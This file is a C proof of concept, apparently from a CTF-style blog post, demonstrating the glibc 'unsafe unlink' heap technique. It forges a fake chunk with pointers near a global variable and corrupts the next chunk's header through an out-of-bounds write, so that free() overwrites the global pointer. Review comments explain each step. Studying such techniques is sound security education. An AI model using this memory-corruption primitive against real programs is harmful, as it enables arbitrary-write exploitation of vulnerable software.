/*
 * pwn unlink — published 2019-10-18
 * A PoC from an experiment.
 *
 * Author: zhz
 * Link: http://yoursite.com/2019/10/18/pwn unlink/
 * License: unless stated otherwise, articles on this blog are published
 * under CC BY-NC-SA 3.0; please credit the source when reposting.
 *
 * What the listing does: it allocates three chunks, writes chosen values
 * into ptr1's user data and into the two words just before ptr2's user
 * data, then frees ptr2 and prints the global `target` before and after
 * the free so any side effect of the free on that global can be observed.
 *
 * NOTE(review): whether `target` changes at all depends on the allocator's
 * chunk layout and on the consistency checks it applies when it unlinks a
 * chunk from a free list; hardened allocators (and thread caches that hand
 * out small chunks without unlinking) may abort or simply not take this
 * path. Confirm on the exact libc version under study before drawing
 * conclusions. The offsets 0x18/0x10 also assume an 8-byte unsigned long
 * (LP64) — verify on the target platform.
 */
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

/* Observable of the experiment: set to ptr1 in main() and printed before
 * and after free(ptr2) to show whether the free modified it. */
unsigned long * target = 0;

/* Disable buffering on the three standard streams (setbuf with a NULL
 * buffer) so every printf() is visible immediately, including while the
 * process is parked on getchar() at the end of main(). */
void init(){
    setbuf(stdin,0);
    setbuf(stdout,0);
    setbuf(stderr,0);
}

int main(){
    init();
    /* Two 0x88-byte allocations followed by a 0x18-byte one. ptr3 is never
     * used again in this listing — presumably it only keeps ptr2 from
     * bordering the top of the heap; confirm against the allocator. */
    unsigned long * ptr1 = malloc(0x88);
    unsigned long * ptr2 = malloc(0x88);
    unsigned long * ptr3 = malloc(0x18);
    target = ptr1;
    /* Fill the start of ptr1's user data with a size-like word and two
     * pointer-sized words derived from the address of `target`. How the
     * allocator interprets each word is allocator-specific — check its
     * chunk layout rather than assuming. */
    ptr1[0] = 0;
    ptr1[1] = 0x81;
    ptr1[2] = (unsigned long)(&target) - 0x18;
    ptr1[3] = (unsigned long)(&target) - 0x10;
    /* Indices -2 and -1 lie before the region malloc() returned for ptr2,
     * i.e. this is an out-of-bounds write into whatever the allocator keeps
     * immediately ahead of the user data (its per-chunk header). This is
     * the metadata corruption the experiment is about. */
    ptr2[-2] = 0x80;
    ptr2[-1] = 0x90;
    /* NOTE(review): %p expects a void *; cast `target` for strict
     * conformance (same on the line after the free). */
    printf("target = %p before free\n",target);
    /* The free whose side effect on `target` is under observation. */
    free(ptr2);
    printf("target = %p after free\n",target);
    /* Print the pid and block on stdin so the process can be inspected
     * (e.g. with a debugger) before it exits. */
    printf("pid = %d\n",getpid());
    getchar();
    return 0;
}